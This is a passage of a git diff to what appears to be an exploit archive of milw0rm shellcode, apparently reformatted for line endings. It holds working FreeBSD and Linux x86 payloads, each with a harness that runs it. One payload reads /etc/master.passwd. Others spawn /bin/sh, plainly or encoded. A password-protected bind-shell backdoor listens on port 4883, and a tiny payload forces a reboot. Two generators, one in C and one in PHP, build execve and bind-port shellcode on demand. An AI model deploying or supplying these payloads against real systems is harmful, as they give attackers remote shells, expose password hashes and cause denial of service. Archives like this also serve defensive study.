+int 0x80 + +; --- setup /etc/master.passwd +jmp short load_file +ok: +pop esi + +; setup /bin/cat +push eax +push 0x7461632f +push 0x6e69622f +mov ebx, esp + +; --- array setup +push eax ; null +push esi ; /etc/master.passwd +push ebx ; /bin/cat +mov edx, esp + +; -- execve() +push eax ; 0 +push edx ; array { "/bin/cat", "/etc/master.passwd", 0} +push ebx ; /bin/cat +mov al, 0x3b +push eax +int 0x80 + +; --- exit +push eax +push eax +int 0x80 + +load_file: +call ok +db '/etc/master.passwd' + +/* + +char code[] = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f" + "\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" + "\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" + "\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd" + "\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63" + "\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61" + "\x73\x73\x77\x64"; + +int main(int argc, char **argv) { + int (*func)(); + printf("Bytes: %d\n", sizeof(code)); + func = (int (*)()) code; + (int)(*func)(); +} + +*/ + ; milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13269.c b/platforms/freebsd_x86/shellcode/13269.c index e35abca82..918cc37f7 100755 --- a/platforms/freebsd_x86/shellcode/13269.c +++ b/platforms/freebsd_x86/shellcode/13269.c @@ -1,43 +1,43 @@ -/* - -Encoded SUB shellcode execve /bin/sh of 48 bytes -by anderson_underground@hotmail.com - -Hack 'n Roll - -*/ - - -char shellcode[] = -"\x31\xd2" -"\xeb\x0e" -"\x31\xdb" -"\x5b" -"\xb1\x19" -"\x83\x2c\x1a\x01" -"\x42" -"\xe2\xf9" -"\xeb\x05" -"\xe8\xed\xff\xff\xff" -"\x32\xc1" -"\x51" -"\x69\x30\x30\x74\x69\x69" -"\x30\x63\x6a" -"\x6f" -"\x32\xdc" -"\x8a\xe4" -"\x51" -"\x55" -"\x54" -"\x51" -"\xb1\x3c" -"\xce" -"\x81"; - - -main(){ -printf("Length: %d\n",strlen(shellcode)); -asm("call shellcode"); -} - +/* + +Encoded SUB shellcode execve /bin/sh of 48 bytes +by anderson_underground@hotmail.com + +Hack 'n Roll + +*/ + + +char shellcode[] = +"\x31\xd2" +"\xeb\x0e" +"\x31\xdb" +"\x5b" +"\xb1\x19" +"\x83\x2c\x1a\x01" +"\x42" +"\xe2\xf9" +"\xeb\x05" +"\xe8\xed\xff\xff\xff" +"\x32\xc1" +"\x51" +"\x69\x30\x30\x74\x69\x69" +"\x30\x63\x6a" +"\x6f" +"\x32\xdc" +"\x8a\xe4" +"\x51" +"\x55" +"\x54" +"\x51" +"\xb1\x3c" +"\xce" +"\x81"; + + +main(){ +printf("Length: %d\n",strlen(shellcode)); +asm("call shellcode"); +} + // milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13270.c b/platforms/freebsd_x86/shellcode/13270.c index e57a9b6e7..e33187151 100755 --- a/platforms/freebsd_x86/shellcode/13270.c +++ b/platforms/freebsd_x86/shellcode/13270.c @@ -1,184 +1,184 @@ -/* -THE ZUGCODE - SMALL REMOTE 6ACKD0R -FreeBSD i386 bind shell with auth -code by MahDelin -Big thx SST [kaka, nolife, white] -Listen on the port 4883 the /bin/sh -*/ - -/* -void zugcode(void ) -{ -//socket -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("pushl %eax"); -__asm__("pushl $0x01"); -__asm__("pushl $0x02"); -__asm__("movl %esp, %ebp"); -__asm__("pushl %ebp"); -__asm__("movb $0x61, %al"); -__asm__("int $0x80"); - -//struct sockaddr_in -__asm__("movl %eax, %edi"); -__asm__("xorl %eax, %eax"); -__asm__("movb $0x02, 9(%ebp)"); -__asm__("movw $0x1313, 10(%ebp)"); -__asm__("movl %eax, 12(%ebp)"); -__asm__("leal 8(%ebp), %ecx"); - -//bind -__asm__("xor %ebx,%ebx"); -__asm__("movb $0x10,%bl"); -__asm__("push %ebx"); -__asm__("push %ecx"); -__asm__("push %edi"); -__asm__("push %eax"); -__asm__("movb $0x68, %al"); -__asm__("int $0x80"); - -//listen -__asm__("xor %eax, %eax"); -__asm__("pushl %eax"); -__asm__("pushl $0x01"); -__asm__("pushl %edi"); -__asm__("pushl %eax"); -__asm__("movb $0x6a, %al"); -__asm__("int $0x80"); - -//accept -__asm__("xor %eax, %eax"); -__asm__("push %ebx"); -__asm__("pushl %eax"); -__asm__("pushl %eax"); -__asm__("pushl %edi"); -__asm__("pushl %eax"); -__asm__("movb $0x1e, %al"); -__asm__("int $0x80"); - -__asm__("mov %eax, %esi"); -__asm__("xor %eax, %eax"); -__asm__("pushl $0x203a7465"); -__asm__("pushl $0x72636573"); -__asm__("movl %esp, %ebx"); -__asm__("push %eax"); -__asm__("push $0x8"); -__asm__("pushl %ebx"); -__asm__("push %esi"); -__asm__("xor %eax, %eax"); -__asm__("push %eax"); -__asm__("movb $0x65, %al"); -__asm__("int $0x80"); - -//rcev password -__asm__("xor %eax, %eax"); -__asm__("pushl %ebp"); -__asm__("movl %esp, %ebp"); -__asm__("movb $0x20, %al"); -__asm__("subl %eax, %esp"); -__asm__("xor %eax, %eax"); -__asm__("push %eax"); -__asm__("mov $0x80, %al"); -__asm__("push %eax"); -__asm__("xor %eax, %eax"); -__asm__("push %ebp"); -__asm__("push %esi"); -__asm__("push %eax"); -__asm__("movb $0x66, %al"); -__asm__("int $0x80"); - -//compare password -//save registers %esi, %edi -__asm__("mov %edi, %ebx"); -__asm__("mov %esi, %edx"); -__asm__("mov %eax, %ecx"); -__asm__(".word 0x50eb"); -__asm__("pop %esi"); -__asm__("mov %ebp, %edi"); -__asm__("repe cmpsb"); -__asm__(".word 0x4275"); -__asm__("mov %ebx, %edi"); -__asm__("mov %edx, %esi"); - -//dup2 stdin -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("pushl %esi"); -__asm__("pushl %eax"); -__asm__("movb $0x5a, %al"); -__asm__("int $0x80"); - -//dup2 stdout -__asm__("xorl %eax, %eax"); -__asm__("inc %eax"); -__asm__("pushl %eax"); -__asm__("pushl %esi"); -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("movb $0x5a, %al"); -__asm__("int $0x80"); - -//dup2 stderr -__asm__("xorl %eax, %eax"); -__asm__("add $0x2, %eax"); -__asm__("pushl %eax"); -__asm__("pushl %esi"); -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("movb $0x5a, %al"); -__asm__("int $0x80"); - -// /bin/sh -__asm__("xor %ecx, %ecx"); -__asm__("pushl %ecx"); -__asm__("pushl $0x68732f2f"); -__asm__("pushl $0x6e69622f"); -__asm__("movl %esp, %ebx"); -__asm__("pushl %ecx"); -__asm__("pushl %ebx"); -__asm__("movl %esp, %edx"); -__asm__("pushl %ecx"); -__asm__("pushl %edx"); -__asm__("pushl %ebx"); -__asm__("pushl %ecx"); -__asm__("movb $0x3b, %al"); -__asm__("int $0x80"); - -//exit -__asm__("xorl %eax, %eax"); -__asm__("inc %eax"); -__asm__("pushl %eax"); -__asm__("pushl %eax"); -__asm__("int $0x80"); - -__asm__(".byte 0xe8"); -__asm__(".long 0xffffffab"); -__asm__(".asciz \"payhash\12\""); -} -*/ - -unsigned char zug[] = -"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31" -"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31" -"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50" -"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31" -"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56" -"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0" -"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89" -"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56" -"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31" -"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f" -"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51" -"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61" -"\x79\x68\x61\x73\x68\x0a"; - -main() -{ -int (*zugcode)(); -printf("shellcode len, %d bytes\n", strlen(zug)); -zugcode = (int (*)()) zug; -(int)(*zugcode)(); -} - +/* +THE ZUGCODE - SMALL REMOTE 6ACKD0R +FreeBSD i386 bind shell with auth +code by MahDelin +Big thx SST [kaka, nolife, white] +Listen on the port 4883 the /bin/sh +*/ + +/* +void zugcode(void ) +{ +//socket +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("pushl %eax"); +__asm__("pushl $0x01"); +__asm__("pushl $0x02"); +__asm__("movl %esp, %ebp"); +__asm__("pushl %ebp"); +__asm__("movb $0x61, %al"); +__asm__("int $0x80"); + +//struct sockaddr_in +__asm__("movl %eax, %edi"); +__asm__("xorl %eax, %eax"); +__asm__("movb $0x02, 9(%ebp)"); +__asm__("movw $0x1313, 10(%ebp)"); +__asm__("movl %eax, 12(%ebp)"); +__asm__("leal 8(%ebp), %ecx"); + +//bind +__asm__("xor %ebx,%ebx"); +__asm__("movb $0x10,%bl"); +__asm__("push %ebx"); +__asm__("push %ecx"); +__asm__("push %edi"); +__asm__("push %eax"); +__asm__("movb $0x68, %al"); +__asm__("int $0x80"); + +//listen +__asm__("xor %eax, %eax"); +__asm__("pushl %eax"); +__asm__("pushl $0x01"); +__asm__("pushl %edi"); +__asm__("pushl %eax"); +__asm__("movb $0x6a, %al"); +__asm__("int $0x80"); + +//accept +__asm__("xor %eax, %eax"); +__asm__("push %ebx"); +__asm__("pushl %eax"); +__asm__("pushl %eax"); +__asm__("pushl %edi"); +__asm__("pushl %eax"); +__asm__("movb $0x1e, %al"); +__asm__("int $0x80"); + +__asm__("mov %eax, %esi"); +__asm__("xor %eax, %eax"); +__asm__("pushl $0x203a7465"); +__asm__("pushl $0x72636573"); +__asm__("movl %esp, %ebx"); +__asm__("push %eax"); +__asm__("push $0x8"); +__asm__("pushl %ebx"); +__asm__("push %esi"); +__asm__("xor %eax, %eax"); +__asm__("push %eax"); +__asm__("movb $0x65, %al"); +__asm__("int $0x80"); + +//rcev password +__asm__("xor %eax, %eax"); +__asm__("pushl %ebp"); +__asm__("movl %esp, %ebp"); +__asm__("movb $0x20, %al"); +__asm__("subl %eax, %esp"); +__asm__("xor %eax, %eax"); +__asm__("push %eax"); +__asm__("mov $0x80, %al"); +__asm__("push %eax"); +__asm__("xor %eax, %eax"); +__asm__("push %ebp"); +__asm__("push %esi"); +__asm__("push %eax"); +__asm__("movb $0x66, %al"); +__asm__("int $0x80"); + +//compare password +//save registers %esi, %edi +__asm__("mov %edi, %ebx"); +__asm__("mov %esi, %edx"); +__asm__("mov %eax, %ecx"); +__asm__(".word 0x50eb"); +__asm__("pop %esi"); +__asm__("mov %ebp, %edi"); +__asm__("repe cmpsb"); +__asm__(".word 0x4275"); +__asm__("mov %ebx, %edi"); +__asm__("mov %edx, %esi"); + +//dup2 stdin +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("pushl %esi"); +__asm__("pushl %eax"); +__asm__("movb $0x5a, %al"); +__asm__("int $0x80"); + +//dup2 stdout +__asm__("xorl %eax, %eax"); +__asm__("inc %eax"); +__asm__("pushl %eax"); +__asm__("pushl %esi"); +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("movb $0x5a, %al"); +__asm__("int $0x80"); + +//dup2 stderr +__asm__("xorl %eax, %eax"); +__asm__("add $0x2, %eax"); +__asm__("pushl %eax"); +__asm__("pushl %esi"); +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("movb $0x5a, %al"); +__asm__("int $0x80"); + +// /bin/sh +__asm__("xor %ecx, %ecx"); +__asm__("pushl %ecx"); +__asm__("pushl $0x68732f2f"); +__asm__("pushl $0x6e69622f"); +__asm__("movl %esp, %ebx"); +__asm__("pushl %ecx"); +__asm__("pushl %ebx"); +__asm__("movl %esp, %edx"); +__asm__("pushl %ecx"); +__asm__("pushl %edx"); +__asm__("pushl %ebx"); +__asm__("pushl %ecx"); +__asm__("movb $0x3b, %al"); +__asm__("int $0x80"); + +//exit +__asm__("xorl %eax, %eax"); +__asm__("inc %eax"); +__asm__("pushl %eax"); +__asm__("pushl %eax"); +__asm__("int $0x80"); + +__asm__(".byte 0xe8"); +__asm__(".long 0xffffffab"); +__asm__(".asciz \"payhash\12\""); +} +*/ + +unsigned char zug[] = +"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31" +"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31" +"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50" +"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31" +"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56" +"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0" +"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89" +"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56" +"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31" +"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f" +"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51" +"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61" +"\x79\x68\x61\x73\x68\x0a"; + +main() +{ +int (*zugcode)(); +printf("shellcode len, %d bytes\n", strlen(zug)); +zugcode = (int (*)()) zug; +(int)(*zugcode)(); +} + // milw0rm.com [2006-07-19] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13271.c b/platforms/freebsd_x86/shellcode/13271.c index c2fbab5d9..58c5c2f36 100755 --- a/platforms/freebsd_x86/shellcode/13271.c +++ b/platforms/freebsd_x86/shellcode/13271.c @@ -1,29 +1,29 @@ -/* - * - * FreeBSD_x86-reboot-7b.c (Shellcode, reboot(RB_AUTOBOOT), 7 bytes) - * - * by IZ - * - */ - - -char shellcode[] = -"\x31\xc0" /* xor %eax,%eax */ - -"\x50" /* push %eax */ -"\xb0\x37" /* mov $0x37,%al */ -"\xcd\x80"; /* int $0x80 */ - - -void main() -{ - int* ret; - - ret = (int*) &ret + 2; - - printf("len %d\n",strlen(shellcode)); - - (*ret) = (int) shellcode; -} - +/* + * + * FreeBSD_x86-reboot-7b.c (Shellcode, reboot(RB_AUTOBOOT), 7 bytes) + * + * by IZ + * + */ + + +char shellcode[] = +"\x31\xc0" /* xor %eax,%eax */ + +"\x50" /* push %eax */ +"\xb0\x37" /* mov $0x37,%al */ +"\xcd\x80"; /* int $0x80 */ + + +void main() +{ + int* ret; + + ret = (int*) &ret + 2; + + printf("len %d\n",strlen(shellcode)); + + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-04-19] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13272.c b/platforms/freebsd_x86/shellcode/13272.c index 6b8e49981..2f6432938 100755 --- a/platforms/freebsd_x86/shellcode/13272.c +++ b/platforms/freebsd_x86/shellcode/13272.c @@ -1,39 +1,39 @@ -/* - - * - * FreeBSD_x86-execve_sh-23b-iZ.c (Shellcode, execve /bin/sh, 23 bytes) - * - * by IZ - * - */ - - -char setreuidcode[] = - -"\x31\xc0" /* xor %eax,%eax */ -"\x50" /* push %eax */ -"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f (//sh) */ -"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f (/bin)*/ - -"\x89\xe3" /* mov %esp,%ebx */ -"\x50" /* push %eax */ -"\x54" /* push %esp */ -"\x53" /* push %ebx */ - -"\x50" /* push %eax */ -"\xb0\x3b" /* mov $0x3b,%al */ -"\xcd\x80"; /* int $0x80 */ - - -void main() -{ - int* ret; - - ret = (int*) &ret + 2; - - printf("len %d\n",strlen(setreuidcode)); - - (*ret) = (int) setreuidcode; -} - +/* + + * + * FreeBSD_x86-execve_sh-23b-iZ.c (Shellcode, execve /bin/sh, 23 bytes) + * + * by IZ + * + */ + + +char setreuidcode[] = + +"\x31\xc0" /* xor %eax,%eax */ +"\x50" /* push %eax */ +"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f (//sh) */ +"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f (/bin)*/ + +"\x89\xe3" /* mov %esp,%ebx */ +"\x50" /* push %eax */ +"\x54" /* push %esp */ +"\x53" /* push %ebx */ + +"\x50" /* push %eax */ +"\xb0\x3b" /* mov $0x3b,%al */ +"\xcd\x80"; /* int $0x80 */ + + +void main() +{ + int* ret; + + ret = (int*) &ret + 2; + + printf("len %d\n",strlen(setreuidcode)); + + (*ret) = (int) setreuidcode; +} + // milw0rm.com [2006-04-14] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13274.c b/platforms/freebsd_x86/shellcode/13274.c index d3bb2fa51..761925e90 100755 --- a/platforms/freebsd_x86/shellcode/13274.c +++ b/platforms/freebsd_x86/shellcode/13274.c @@ -34,6 +34,6 @@ int main(){ * "call jmpme \n" * * ".string \"/bin/sh\" \n"); * *} * - *****************************************/ - + *****************************************/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13275.c b/platforms/freebsd_x86/shellcode/13275.c index 68506af6f..7ef97cc65 100755 --- a/platforms/freebsd_x86/shellcode/13275.c +++ b/platforms/freebsd_x86/shellcode/13275.c @@ -52,6 +52,6 @@ main(void) int *ret; ret = (int*)&ret+2; (*ret) = shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13276.c b/platforms/freebsd_x86/shellcode/13276.c index e2f6ffb99..29bf94914 100755 --- a/platforms/freebsd_x86/shellcode/13276.c +++ b/platforms/freebsd_x86/shellcode/13276.c @@ -83,6 +83,6 @@ main(void) void (*code)() = (void *)_freebsd_code; printf("strlen code: %d\n", strlen(freebsd_code)); code(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13277.c b/platforms/freebsd_x86/shellcode/13277.c index bbfb2cd30..5b050516d 100755 --- a/platforms/freebsd_x86/shellcode/13277.c +++ b/platforms/freebsd_x86/shellcode/13277.c @@ -74,6 +74,6 @@ main(void) void (*code)() = (void *)freebsd_code; printf("strlen code: %d\n", strlen(freebsd_code)); code(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/generator/shellcode/13281.c b/platforms/generator/shellcode/13281.c index d588a34cf..3ed42b131 100755 --- a/platforms/generator/shellcode/13281.c +++ b/platforms/generator/shellcode/13281.c @@ -1,194 +1,194 @@ -/* *\ -[] [] -[] Shellcode Generator null byte free. [] -[] [] -[] Author: certaindeath [] -[] Site: certaindeath.netii.net (at the moment under construction) [] -[] [] -[] This program generates a shellcode which uses the stack to store the command (and its arguments). [] -[] Afterwords it executes the command with the system call "execve". [] -[] [] -[] The code is a bit knotty, so if you want to understand how it works, I've added an example of assembly at the end. [] -[] [] -\* */ -#include -#include -#include -#include -#include -#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command - -void print_c(__u8*,int); -void push_shc(__u8*, char*, int*); -int main(int argc, char *argv[]){ - char cmd[255], *a; - FILE *c; - int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2; - __u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0}; - - if(argc<2){ - printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" - "| Shellcode Generator |\n" - "| by certaindeath |\n" - "| |\n" - "| Usage: ./generator |\n" - " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); - _exit(1); - } - a=(char *)malloc((9+strlen(argv[1]))*sizeof(char)); - - //find the command path - a[0]=0; - strcat(a, "whereis "); - strcat(a, argv[1]); - c=popen(a, "r"); - while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c))); - while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c))); - cmd[--k]=0; - - if(k==0){ - printf("No executables found for the command \"%s\".\n", argv[1]); - _exit(1); - } - - if(strlen(cmd)>254){ - printf("The lenght of the command path can't be over 254 bye.\n"); - _exit(1); - } - - for(i=2;i254){ - printf("The lenght of each command argument can't be over 254 byte.\n"); - _exit(1); - } - //work out the final shellcode lenght - b=(k%2); - b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2); - totl+=(6+5*((k-(k%4))/4)+4*b1+7*b); - for(i=2; i2) - push_shc(shc, argv[argc-1], &shp); - else - push_shc(shc, cmd, &shp); - memset(shc+(shp++), 0x89, 1); - memset(shc+(shp++), 0xe6, 1); - if(argc>2){ - for(i=argc-2;i>1;i--) - push_shc(shc, argv[i], &shp); - push_shc(shc, cmd, &shp); - } - memset(shc+(shp++), 0x50, 1); - memset(shc+(shp++), 0x56, 1); - if(argc>2){ - for(i=argc-2;i>1;i--){ - memset(shc+(shp++), 0x83, 1); - memset(shc+(shp++), 0xee, 1); - memset(shc+(shp++), strlen(argv[i])+1, 1); - memset(shc+(shp++), 0x56, 1); - } - memset(shc+(shp++), 0x83, 1); - memset(shc+(shp++), 0xee, 1); - memset(shc+(shp++), strlen(cmd)+1, 1); - memset(shc+(shp++), 0x56, 1); - } - memcpy(shc+shp, end, 16); - print_c(shc,totl); - return 0; -} -void print_c(__u8 *s,int l){ - int k; - for(k=0;k +#include +#include +#include +#include +#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command + +void print_c(__u8*,int); +void push_shc(__u8*, char*, int*); +int main(int argc, char *argv[]){ + char cmd[255], *a; + FILE *c; + int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2; + __u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0}; + + if(argc<2){ + printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" + "| Shellcode Generator |\n" + "| by certaindeath |\n" + "| |\n" + "| Usage: ./generator |\n" + " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); + _exit(1); + } + a=(char *)malloc((9+strlen(argv[1]))*sizeof(char)); + + //find the command path + a[0]=0; + strcat(a, "whereis "); + strcat(a, argv[1]); + c=popen(a, "r"); + while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c))); + while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c))); + cmd[--k]=0; + + if(k==0){ + printf("No executables found for the command \"%s\".\n", argv[1]); + _exit(1); + } + + if(strlen(cmd)>254){ + printf("The lenght of the command path can't be over 254 bye.\n"); + _exit(1); + } + + for(i=2;i254){ + printf("The lenght of each command argument can't be over 254 byte.\n"); + _exit(1); + } + //work out the final shellcode lenght + b=(k%2); + b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2); + totl+=(6+5*((k-(k%4))/4)+4*b1+7*b); + for(i=2; i2) + push_shc(shc, argv[argc-1], &shp); + else + push_shc(shc, cmd, &shp); + memset(shc+(shp++), 0x89, 1); + memset(shc+(shp++), 0xe6, 1); + if(argc>2){ + for(i=argc-2;i>1;i--) + push_shc(shc, argv[i], &shp); + push_shc(shc, cmd, &shp); + } + memset(shc+(shp++), 0x50, 1); + memset(shc+(shp++), 0x56, 1); + if(argc>2){ + for(i=argc-2;i>1;i--){ + memset(shc+(shp++), 0x83, 1); + memset(shc+(shp++), 0xee, 1); + memset(shc+(shp++), strlen(argv[i])+1, 1); + memset(shc+(shp++), 0x56, 1); + } + memset(shc+(shp++), 0x83, 1); + memset(shc+(shp++), 0xee, 1); + memset(shc+(shp++), strlen(cmd)+1, 1); + memset(shc+(shp++), 0x56, 1); + } + memcpy(shc+shp, end, 16); + print_c(shc,totl); + return 0; +} +void print_c(__u8 *s,int l){ + int k; + for(k=0;k http://www.shell-storm.org/shellcode/ -*/ - -function syntax() - { - echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; - } - -function linux86bind($port) - { - if($port > 65535 || $port < 4100){ - echo "Erreur Port\nSelect a port between 4100 and 65535\n"; - return false; - } - - $inser .= "\nchar shellcode[] = \n"; - $inser .= " /* BindPort TCP/$port; Linux/x86; Gen:http://www.shell-storm.org */\n"; - $inser .= "\n"; - $inser .= " \x22\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\x22\n"; - $inser .= " \x22\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x"; - - $res_port = base_convert($port, 10, 16); - - $length = strlen($res_port)-1; - $i = 1; - - for($idx = 0; $idx < $length+1; $idx++) - { - $i++; - if($i == 4) - $inser .= "\\x"; - - $inser .= $res_port[$idx]; - } - - $inser .= "\\x43\\x66\\x53\x22\n"; - $inser .= " \x22\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\x22\n"; - $inser .= " \x22\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\x22\n"; - $inser .= " \x22\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\x22\n"; - $inser .= " \x22\\xe1\\xb0\\x0b\\xcd\\x80\x22\x3b\n"; - $inser .= "\n"; - $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; - $inser .= " (*(void(*)()) shellcode)();\n"; - $inser .= "\n"; - $inser .= "\n"; - - return $inser; -} - -if($argc < 2){ - syntax(); - return false; - } - $port = $argv[1]; - echo linux86bind($port); - -?> - + http://www.shell-storm.org/shellcode/ +*/ + +function syntax() + { + echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; + } + +function linux86bind($port) + { + if($port > 65535 || $port < 4100){ + echo "Erreur Port\nSelect a port between 4100 and 65535\n"; + return false; + } + + $inser .= "\nchar shellcode[] = \n"; + $inser .= " /* BindPort TCP/$port; Linux/x86; Gen:http://www.shell-storm.org */\n"; + $inser .= "\n"; + $inser .= " \x22\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\x22\n"; + $inser .= " \x22\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x"; + + $res_port = base_convert($port, 10, 16); + + $length = strlen($res_port)-1; + $i = 1; + + for($idx = 0; $idx < $length+1; $idx++) + { + $i++; + if($i == 4) + $inser .= "\\x"; + + $inser .= $res_port[$idx]; + } + + $inser .= "\\x43\\x66\\x53\x22\n"; + $inser .= " \x22\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\x22\n"; + $inser .= " \x22\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\x22\n"; + $inser .= " \x22\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\x22\n"; + $inser .= " \x22\\xe1\\xb0\\x0b\\xcd\\x80\x22\x3b\n"; + $inser .= "\n"; + $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; + $inser .= " (*(void(*)()) shellcode)();\n"; + $inser .= "\n"; + $inser .= "\n"; + + return $inser; +} + +if($argc < 2){ + syntax(); + return false; + } + $port = $argv[1]; + echo linux86bind($port); + +?> + # milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/generator/shellcode/13283.php 